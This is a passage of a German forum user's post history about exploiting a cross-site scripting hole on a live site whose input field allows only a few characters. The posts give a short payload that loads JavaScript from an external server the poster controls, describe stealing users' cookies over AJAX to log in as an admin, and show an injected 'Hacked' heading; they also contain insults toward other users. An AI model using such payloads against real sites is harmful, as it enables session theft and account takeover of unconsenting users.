Wir brauchen einen Reschreibkontrolleur (wie der Typ bei YouTube).
Dann wird der Content hier bestimmt hochwertiger.
Beiträge von lNobodyl
-
-
@ECB2
. Seite neuladen. Sonst nochmal.Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.
Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
Ist ja einfach -
@klinker_ Mit JavaScript lässt sich viel machen. Ein Grund wieso die Betreiber eine Cross site scripting Lücke fixen sollten, ist die Sicherheit der Benutzer.
Wenn man Cookies stealt läuft der User in Gefahr gehackt zu werden.
Man könnte auch mit JavaScript eine Datei downloaden lassen.
Man kann sehr viel machen mit JavaScript. -
@ECB2
. Seite neuladen. Sonst nochmal.Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.
Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
Ist ja einfach -
Hier hast du deine Antwort. Nettes Script von dir.
Wenn du das Script im Zitat analysierst, wirst du erkennen das ich einfach ein AJAX (GET METHODE) mit dem Cookie gesendet habe.
Du hast es natürlich professioneller gemacht. Base64 encode usw, aber besser wäre es einfach mit AJAX gewesen. Ist schneller und ist kürzer.
Habe jQuery benutzt da die Bibliothek dort benutzt wurde, und kürzer ist.
-
Die Moderatoren greifen schon echt hart durch.
Das Thema langweilt mich, ich werde nur noch auf konstruktive Meinungen ohne Beleidigungen antworten. Danke.
Ich bin mal draußen. -
-
So Mission Completed.
Payload:
<script src=//1223.gq/></script>
Es wird eine JavaScript Datei ausgeliefert.
Sie wird auch ausgeführt. POC Video folgt:Externer Inhalt www.youtube.comInhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.P.S: THX An die Seekuh Crew für die Verkürzung von dem src=//
-
Nett. Unser Payload hat doch soweit funktioniert. Es hat ein Script von einem externen Webserver geladen.
Auf dem Webserver haben wir Zugriff.
Euer Payload ist bis jetzt nur eine Theorie (Meine Meinung ist auch das euer Payload funktionieren würde).
Schön wer jetzt, wenn einer es schafft das Script nicht nur zu laden, sondern auch es auszuführen, weil unser und euer Payload hat es noch nicht geschafft die geladene JavaScript Datei zum Ausführen zu bringen. ( Ein einfacher Alert in der JavaScript Datei reicht schon)
Dann wäre es ein richtiges POC.
Man könnte dann z.B die Cookies stealen und versuchen sich als Admin zu authentifizieren.
@klinker Gute Arbeit. Hast doch was drauf.
-
@einmadejay . Ich verstehe nicht denn Sinn hinter dem ganzen Müll den du hier reinschreibst. Wenn du keine Ahnung von diesem Thema hast, dann schreib nichts und verpiss dich einfach.
-
@Firesky Endlich jemand der versteht was ich versuche zu sagen.
Er hats begriffen, dann wirds bestimmt für dich bestimmt nicht so schwer sein. -
@einmadejay . Das ist kein POC. POC = Proof of concept.
Gib mir jetzt einen einfachen Payload der dort hinein passt.
Sonst muss ich dich jetzt als Noob einstufen.
Den Link den du mir geschickt hast wird da schonmal gar nicht hineinpassen.P.S: Nenne mir mal die "diversen Links".
-
-
Nenn mir bitte ein POC den ich selbst testen kann. Der diese Länge nicht überschreitet und ein Script von einem externen Server lädt. Dann reden wir weiter.
-
@
<script src="link/script.js"></script>& schon kannste alles machen.
Stimmt leider nicht. Du hast kein Zugriff auf den Server. Das bedeutet du müsstest auf einen anderen, externen Server den Link setzen.
z.B <script src="http://194.123.15.1/link/script.js"></script>. Das Überschreitet die x Zeichen und es wird ein Error geworfen -
@einmadejay. Stimmt nur teilweise. Du kannst alles bis zu einer bestimmten Länge injecten. Ich schätze mal grob 7 Zeichen ab. Wenn es länger ist passt es nicht mehr in das Feld in der Tabelle der Datenbank. (Genau weiß ich das nicht, meine Meinung).
Maximal sieben Zeichen. Sonst wird ein Fehler generiert. Sei es HTML, CSS oder Javascript Code.
-
-
@klinker_ Dann hör auf das Maul aufzureisen und mach es besser. Example exploit: <h1>Hacked</h1>
Da die Programmierer immernoch nicht kapiert haben wie man eine Cross site scripting Lücke fixed.Die Funktion htmlentities ersetzt alle gefährlichen Zeichen durch ungefärhliche HTML Zeichen.